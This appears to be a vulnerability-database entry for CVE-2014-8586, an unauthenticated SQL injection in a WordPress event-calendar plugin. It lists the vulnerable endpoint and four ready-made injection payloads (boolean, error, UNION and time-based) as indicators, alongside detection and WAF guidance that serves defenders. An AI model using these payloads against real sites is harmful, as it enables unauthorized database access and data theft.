cbcvebase.
CVE-2014-8586
published 2014-11-04

CVE-2014-8586: SQL injection vulnerability in the CP Multi View Event Calendar plugin 1.01 for WordPress allows remote attackers to execute arbitrary SQL commands via the…

PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
40.09%
98.5th percentile
SQL injection vulnerability in the CP Multi View Event Calendar plugin 1.01 for WordPress allows remote attackers to execute arbitrary SQL commands via the calid parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
cp_multi_view_event_calendar_projectcp_multi_view_event_calendar

Detection & IOCsextracted from sources · hover to see the quote

url/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1
commandcalid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END))
commandcalid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
commandcalid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
commandcalid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41))
  • Monitor GET requests targeting the WordPress CP Multi-View Event Calendar plugin endpoint with parameters cpmvc_do_action=mvparse, f=datafeed, method=list, and a suspicious calid parameter value (e.g., containing SQL keywords such as RLIKE, UNION, SELECT, BENCHMARK, AND/OR).
  • Detect boolean-based blind SQLi attempts via RLIKE with CASE/WHEN constructs in the calid GET parameter.
  • Detect error-based SQLi attempts using INFORMATION_SCHEMA.CHARACTER_SETS with FLOOR(RAND()) GROUP BY in the calid GET parameter.
  • Detect UNION-based SQLi with 14 NULL columns in the calid GET parameter; the UNION query uses a 14-column schema specific to this plugin's datafeed query.
  • Detect time-based blind SQLi via BENCHMARK(5000000,MD5(...)) in the calid GET parameter; heavy query causing measurable response delay.
  • A Metasploit auxiliary scanner module exists for this vulnerability targeting unauthenticated SQL injection in CP Multi-View Calendar; watch for automated scanning patterns against the datafeed endpoint.
  • ·The vulnerability is unauthenticated — no WordPress login is required to exploit it, meaning perimeter WAF rules on the datafeed endpoint are the primary preventive control.
  • ·The calid parameter is entirely unsanitized; any integer-type allowlist enforcement on this parameter at the WAF/application layer will block all known attack vectors.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.